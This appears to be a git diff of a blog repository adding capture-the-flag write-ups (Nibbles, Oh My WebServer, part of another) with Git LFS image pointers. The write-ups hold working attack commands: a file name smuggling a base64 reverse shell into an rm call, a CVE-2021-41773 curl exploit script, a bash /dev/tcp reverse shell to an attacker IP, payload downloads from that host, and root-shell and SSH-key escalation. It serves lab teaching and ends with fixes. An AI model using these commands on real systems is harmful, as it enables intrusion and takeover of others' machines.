$msg=''; + if ($value == 'index.html') { + continue; + } + #echo "-------------\n"; + + #print "check: $value\n"; + list ($name,$ext) = getnameCheck($value); + $check = check_ip($name,$value); + + if (!($check[0])) { + echo "attack!\n"; + # todo: attach file + file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX); + + exec("rm -f $logpath"); + exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); + echo "rm -f $path$value\n"; + mail($to, $msg, $msg, $headers, "-F$value"); + } +} + +?> +``` +Interestingly, the script executes an `rm` command with a variable directly. All this without verification! So I will be able to create a file with a name composed of a command. + +The file name will be composed of a name, then a `;` to indicate the end of the command, then a reverse shell in base64 because we are not allowed to put `/` in the file name. + +To create the file I use the following command: + + +```bash +touch /var/www/html/uploads/test';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zLzEyMzUgMD4mMQo= | base64 -d | bash' +``` +I wait a few seconds and now I have a reverse shell and I can get the first flag. + +![](img/image-12.webp) + +## Privilege escalation + +First I check the sudo permissions of my user : + +![](img/image-13.webp) + +I have the right to run the `changename.sh` script as root. Looking at the code of the script, I determine that it allows to change the name of a network interface. + + +```bash +#!/bin/bash -p +cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF +DEVICE=guly0 +ONBOOT=no +NM_CONTROLLED=no +EoF + +regexp="^[a-zA-Z0-9_\ /-]+$" + +for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do + echo "interface $var:" + read x + while [[ ! $x =~ $regexp ]]; do + echo "wrong input, try again" + echo "interface $var:" + read x + done + echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly +done +``` +After some research on the Linux distributions used by the machine I find the following flaw: [CentOS Network Interface Exploit](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f). + +On CentOS there is an exploit that allows to execute commands as `root` via the name of a network interface. + +I execute the script and enter the following name for the interface: + +![](img/image-14.webp) + +I now have a reverse shell `root` and I can get the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave the source code of the website accessible by all +- Set up an additional protection on the upload to avoid sending code +- Do not use variables in commands without Sanitizing diff --git a/content/writeup-ctf/writeup-nibbles-htb/featured.png b/content/writeup-ctf/writeup-nibbles-htb/featured.png new file mode 100644 index 0000000..a1efe55 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2728984adb9ff67af8ccd0e721d18a0580cf655db339d379252e5d86c7ed983b +size 242961 diff --git a/content/writeup-ctf/writeup-nibbles-htb/featured.webp b/content/writeup-ctf/writeup-nibbles-htb/featured.webp new file mode 100644 index 0000000..b0e326a --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1030fe0d3e3815f705465f28566fa0873f4b32e583bc828eeb2dadd19cbeebd8 +size 25880 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-1.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.png new file mode 100644 index 0000000..f30d1e7 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8cb046b79ecab50607331c162c8f5ad06f3c3b9a3d0838c06c270032bb1a6405 +size 35033 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-1.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.webp new file mode 100644 index 0000000..35d41ed --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6efca91a26b3e8ef34f20d032c75c22c3cdc2e01c81391c12f44d8bbd0dc1cd4 +size 30446 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-10.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.png new file mode 100644 index 0000000..2eae908 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d876bd1693160bf180f3424b2382dbd249c4c575131c6997ecab621404dea501 +size 38478 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-10.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.webp new file mode 100644 index 0000000..8a85a0f --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c6ba9a629a19d3e945ba76885dd95d47726057322cd806704ab39a339cec652 +size 48086 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-2.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.png new file mode 100644 index 0000000..d78bf9f --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:afe438e7ea228e870d34aae4ef8c60d50c1e55cc7f23c4d71cc226ddca9b2ccd +size 21888 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-2.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.webp new file mode 100644 index 0000000..84f69cc --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ecbd2bddf49e40bbcca9fce273cada3dc3341c31bd3b17888369ab067a7c60c +size 11970 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-3.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.png new file mode 100644 index 0000000..bbfc080 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a1a132471cef563e4209ea6b92d5bdaf37911e8f6334ee2f657a2844212a9c66 +size 74495 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-3.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.webp new file mode 100644 index 0000000..08c3d14 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32c6d25f6dfd1e46e99e5029408c847e280e61938a4988985bfa6bcbf29b2775 +size 75378 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-4.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.png new file mode 100644 index 0000000..3bc6c6a --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5cd379a409cfd68429a3d49cde20d2e30aad7ea57a1e43699de532df2813076 +size 10254 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-4.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.webp new file mode 100644 index 0000000..b208426 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1cc0846c299dfeb2ff6759d79ee1da420c15dad2e152611c31e808da06d135cc +size 6172 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-5.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.png new file mode 100644 index 0000000..3af2beb --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:125debd8b152b36dc14d632690878453337c31668581a28fa1d7afdf7818eaec +size 121057 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-5.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.webp new file mode 100644 index 0000000..c2c6b15 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1e7d7e2df5c7139a72a0a8da5cf3ba3267f284d7fb63fd3cc660829eaae2e452 +size 124196 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-6.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.png new file mode 100644 index 0000000..e48bdec --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72f78bd5fc1e55cb8611ab2e1cd7db9d79d7029655b6a91634686fd3711c639f +size 18545 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-6.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.webp new file mode 100644 index 0000000..7dd934c --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:77e99f6755423f77fbd9d3eeb9b7f3e5f1efd4446066b090850c2f82f326b4d8 +size 10326 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-7.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.png new file mode 100644 index 0000000..ca8343e --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f86b0817fd5424f504f74a1619d208ab8f7aabdf2fd3c9e4b165214a95e1b39d +size 39876 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-7.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.webp new file mode 100644 index 0000000..392ea48 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14a15c6cb8a9dbb9edfae7f56356cfef350141e91444f663a6f96e9fc4d898e5 +size 35382 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-8.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.png new file mode 100644 index 0000000..e735b7c --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb2472f7d76d9eb1774d057bece45404bf50d5da5ba7dac964bd062f3913aa8a +size 16941 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-8.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.webp new file mode 100644 index 0000000..afb54c9 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdcf1b62e54dbed0197e40692953eafcf148a761b154f05fab8615db71da66e6 +size 20754 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-9.png b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.png new file mode 100644 index 0000000..b780c95 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62a1b24239485495ddd0cabdee2b497686d29db42e199870988218831ae85c4b +size 9411 diff --git a/content/writeup-ctf/writeup-nibbles-htb/img/image-9.webp b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.webp new file mode 100644 index 0000000..6d5137e --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9e9c6eda536e8ac7214645ea22f454c7490157e2aef04bb8d07aebc12cf6271a +size 13398 diff --git a/content/writeup-ctf/writeup-nibbles-htb/index.md b/content/writeup-ctf/writeup-nibbles-htb/index.md new file mode 100644 index 0000000..9c2e532 --- /dev/null +++ b/content/writeup-ctf/writeup-nibbles-htb/index.md @@ -0,0 +1,101 @@ +--- +title: "Writeup - Nibbles (HTB)" +date: 2022-05-17 +slug: "writeup-nibbles-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Nibbles](https://app.hackthebox.com/machines/Nibbles) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.2p2) +- 80/tcp : HTTP web server (Apache 2.4.18) + +## Exploit + +Looking at the source code of the web page I found the following comment: + + +```bash + +``` +So I go to this new page: + +![](img/image-2.webp) + +I then search the pages present on the site with `ffuf`. + +![](img/image-3.webp) + +One page is particularly interesting: `admin`. + +![](img/image-4.webp) + +So I try to brute force the password of the `admin` user with the `hydra` command. + +![](img/image-5.webp) + +Although the command finds several results it does not work. Indeed there is an anti-brute force security. So I try to test common passwords and after a few tries I find the following credentials: `admin/nibbles`. + +It's good but rather frustrating not to have found a more legit way. After some research I find a solution online to test passwords taking into account the anti brute force: [brute force version](https://eightytwo.net/blog/brute-forcing-the-admin-password-on-nibbles/). + +I can now connect to the admin panel! After going through the panel, I find the following page where you can upload images. + +![](img/image-6.webp) + +So I try to send a reverse shell in php, then I go to the following link to execute it: + + +```bash +10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php +``` +I now have a reverse shell as a `nibbler` and I can get the first flag. + +![](img/image-7.webp) + +## Privilege escalation + +I start by checking the sudo permissions of my user: + +![](img/image-8.webp) + +I find it in my personal folder a `.zip` file, I unzip it : + +![](img/image-9.webp) + +The script can be modified by myself and can be executed as root. I put the following content in the script `monitor.sh` : + + +```bash +mkdir /root/.ssh +touch /root/.ssh/authorized_keys +echo 'id_rsa' > /root/.ssh/authorized_keys +``` +This will create the SSH folder of the root user and then add my key in the `authorized_keys`. To execute the script I use the following command: + + +```bash +sudo -n ./monitor.sh +``` +I can now log in as root and get the last flag. + +![](img/image-10.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave important comments in HTML code +- Update NibbleBlog to fix file upload problem +- Do not let user-modifiable scripts be executed by the root user diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.png new file mode 100644 index 0000000..57e8b7e --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca424309d980684aefa5f9eed353222ff02c32896da283858be3575c70ae7aa8 +size 482981 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.webp new file mode 100644 index 0000000..ae7da16 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d3f9b7f4413642ac680ac2ee76585560f215b8af2715b8b2270bf5d7fedecf3a +size 482464 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.png new file mode 100644 index 0000000..42888ce --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0325f75ba2e071c53a8dd6832558e7cf57d0534e1a0b7cc0e061037da368a53c +size 44434 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.webp new file mode 100644 index 0000000..2d51207 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25ca1e7534478abacb27fd747798e567bacb8fe7b619ee763124099efe24864c +size 36242 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.png new file mode 100644 index 0000000..02edb76 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ac4d5d29657495c3d2abbca0a27072ffbb3658e6f23f8c251ba07ac8e85ee7df +size 320376 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.webp new file mode 100644 index 0000000..159426c --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa7b1cc87107152d6212f1edb12daf2981b359b871776e9600b6d8907c8738fd +size 67106 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.png new file mode 100644 index 0000000..067501a --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:49b29bb2d7c67cf64ebba15266481697b08da9cd1b34f5315f773632a247e3f6 +size 10637 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.webp new file mode 100644 index 0000000..0309895 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f6dc6353f22b67dcc74f3e2c5c04ca2c761a3c2de08457c6edc69757bb289ed +size 8988 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.png new file mode 100644 index 0000000..544f231 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:372f02d4abf77a951ba97c499f1fcb3a45ff37948fad95e63fd42a8dffc0e29a +size 21100 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.webp new file mode 100644 index 0000000..8bf815d --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1a7421241ba654ca030d9945d4cf3636b0acaa1128b7dbac6d8d41da8fae945 +size 14096 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.png new file mode 100644 index 0000000..f0f9a4c --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2351d8ba7bc08b6932ad9cf5c25d821e0f25e20c2fe053be59f76cec36f5823f +size 44982 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.webp new file mode 100644 index 0000000..6d18d3e --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:020e86a0b229d11f58d79383ecb8e6280f968e2e9c9d67338ef7cdf92e7ed02f +size 38572 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.png new file mode 100644 index 0000000..4ea0353 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:899e1377d273f0d9ff7a0a721e5d2fd5f7884f031f83b19ec58a32d5a1c3e8b4 +size 21732 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.webp new file mode 100644 index 0000000..439cf66 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3901df76c761988582d057835727d31b1e0fb6b29f18a3930787bf8bd9a4a229 +size 16766 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.png new file mode 100644 index 0000000..7b5f71f --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd6a473c03da066e20d293a8294a92067ddac48fdc14380e089058418aeed1af +size 32835 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.webp new file mode 100644 index 0000000..147ca3b --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff038f690a3a7f6ae325711eb3d315087d6fceb64d3346a466a1cf0a7f5b5cf7 +size 22312 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.png new file mode 100644 index 0000000..90ba36d --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f2b110853c2f30a01693811870e7d5cee63d8d47e993d038874c2df644422f7d +size 23909 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.webp new file mode 100644 index 0000000..a374d9a --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06fee1be334b0f228b82af19df52815f06c53c4e2a8f99048723bfb0cc9c72a9 +size 18808 diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/index.md b/content/writeup-ctf/writeup-oh-my-webserver-thm/index.md new file mode 100644 index 0000000..05f2ca5 --- /dev/null +++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/index.md @@ -0,0 +1,120 @@ +--- +title: "Writeup - Oh My WebServer (THM)" +date: 2022-03-10 +slug: "writeup-oh-my-webserver-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [oh my webserver](https://tryhackme.com/room/ohmyweb) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.9.138 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.49) + +![](img/image-2.webp) + +## Exploit + +After some research, I find that this version of Apache is exploitable with the [CVE-2021-41773](https://www.exploit-db.com/exploits/50383). This exploit allows to execute code via a transverse path. + +So I create a shell script with the following content: + + +```bash +#!/bin/bash + +if [[ $1 == '' ]]; [[ $2 == '' ]]; then +echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] +echo ./PoC.sh targets.txt /etc/passwd +exit +fi +for host in $(cat $1); do +echo $host +curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done +``` +After adding the execution rights, I run the script with the id command to check that the target is exploitable with this exploit. + +![](img/image-3.webp) + +The exploit works, now let's create a reverse shell : + + +```bash +bash exploit.sh targets.txt /bin/sh 'bash -c "bash -i >& /dev/tcp/10.8.3.186/1234 0>&1"' +``` +![](img/image-4.webp) + +I am now connected, but I quickly notice that I am in a docker. I upload [linPeas](linpeas.sh), to make a first analysis of the environment: + + +```bash +daemon@4a70924bafa0:/tmp$ curl 10.8.3.186:81/linpeas.sh > linpeas.sh + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed +100 747k 100 747k 0 0 3415k 0 --:--:-- --:--:-- --:--:-- 3415k +daemon@4a70924bafa0:/tmp$ chmod +x linpeas.sh +``` +![](img/image-5.webp) + +Python3 has a "cap\_setuid", I will be able to use this to get the route access in the docker. To do this I use the command found on [GTFOBins](https://gtfobins.github.io/gtfobins/python/#capabilities) : + + +```bash +python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' +``` +![](img/image-6.webp) + +I now have root access in the docker and I can get the first flag! + +## Privilege escalation + +I'm still in a docker, so to take control of the target machine I'll have to find a way out of the docker... + +Generally, there are open ports between the host and a docker. These ports are used for services (web, database, ...), but also in some cases for docker management. + +So I will first perform an nmap scan in the docker. To do this I will download the [nmap binary](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap) and upload it in the docker. + + +```bash +daemon@4a70924bafa0:/tmp$ curl 10.8.3.186:81/nmap > nmap + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed +100 5805k 100 5805k 0 0 9740k 0 --:--:-- --:--:-- --:--:-- 9723k +daemon@4a70924bafa0:/tmp$ chmod +x nmap +``` +Je sais que l'ip du docker est 172.17.0.2, il y a donc de forte chance que l'IP de l'hote soit 172.17.0.1. Teston cette IP dans un premier temps : + + +```bash +./nmap 172.17.0.1 -p- +``` +![](img/image-7.webp) + +In addition to ports 22 and 80, I find an unknown port: 5986. After some research I quickly find out that this is a port generally used to perform a remote management of Azure machines (Microsoft cloud). + +I found this [site](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure/) that indicates a number of CVEs including one that allows a root connection without authentication: CVE-2021-38647. Let's look for a script allowing its exploitation. + +I find this [script](https://github.com/horizon3ai/CVE-2021-38647), which allows to send commands to the host as root. This will allow us to get the last flag : + +![](img/image-8.webp) + +To take control of the host, we just need to retrieve "id\_rsa" contained in the "/root/.ssh" folder and initiate an SSH connection with it. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update Apache +- Do not leave Python with the "CAP\_SETUID" set +- Update OMI to patch CVE-2021-38647 diff --git a/content/writeup-ctf/writeup-ollie-thm/featured.png b/content/writeup-ctf/writeup-ollie-thm/featured.png new file mode 100644 index 0000000..9d71bb1 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cfaf46c59867a962897c7b782bec43c4365d08d3c89b7e521f28f002ae95883e +size 200283 diff --git a/content/writeup-ctf/writeup-ollie-thm/featured.webp b/content/writeup-ctf/writeup-ollie-thm/featured.webp new file mode 100644 index 0000000..9be4e23 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a303e588a4a4dfb05565267f1770d79ef89260291d53db7629e13c182578257e +size 142236 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-1.png b/content/writeup-ctf/writeup-ollie-thm/img/image-1.png new file mode 100644 index 0000000..fee2b67 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4aef54f1f404885d3489127de15909143f789dac6a90e3f428cb2565170701e6 +size 28485 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-1.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-1.webp new file mode 100644 index 0000000..919bc81 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e335c867c9728bdc95b39668ebefcb6770bc5b2b3768536aaf08b97e35569e7b +size 26116 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-2.png b/content/writeup-ctf/writeup-ollie-thm/img/image-2.png new file mode 100644 index 0000000..bb1137e --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:26cd9f2d1eedd06e659c78722034a347469771789fc554c966f904fedf899bdd +size 930510 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-2.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-2.webp new file mode 100644 index 0000000..fbb30c8 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f9166b47edf8d9fb1bd13853ed4ca5f6a6e1c4b348485d308f720549039ffd48 +size 80104 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-3.png b/content/writeup-ctf/writeup-ollie-thm/img/image-3.png new file mode 100644 index 0000000..7d0d1b9 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f53e33e357bc63ed82431dd0b7ba0017dd1e019942ec520efed21aca917582e4 +size 2179837 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-3.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-3.webp new file mode 100644 index 0000000..a7433d3 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version 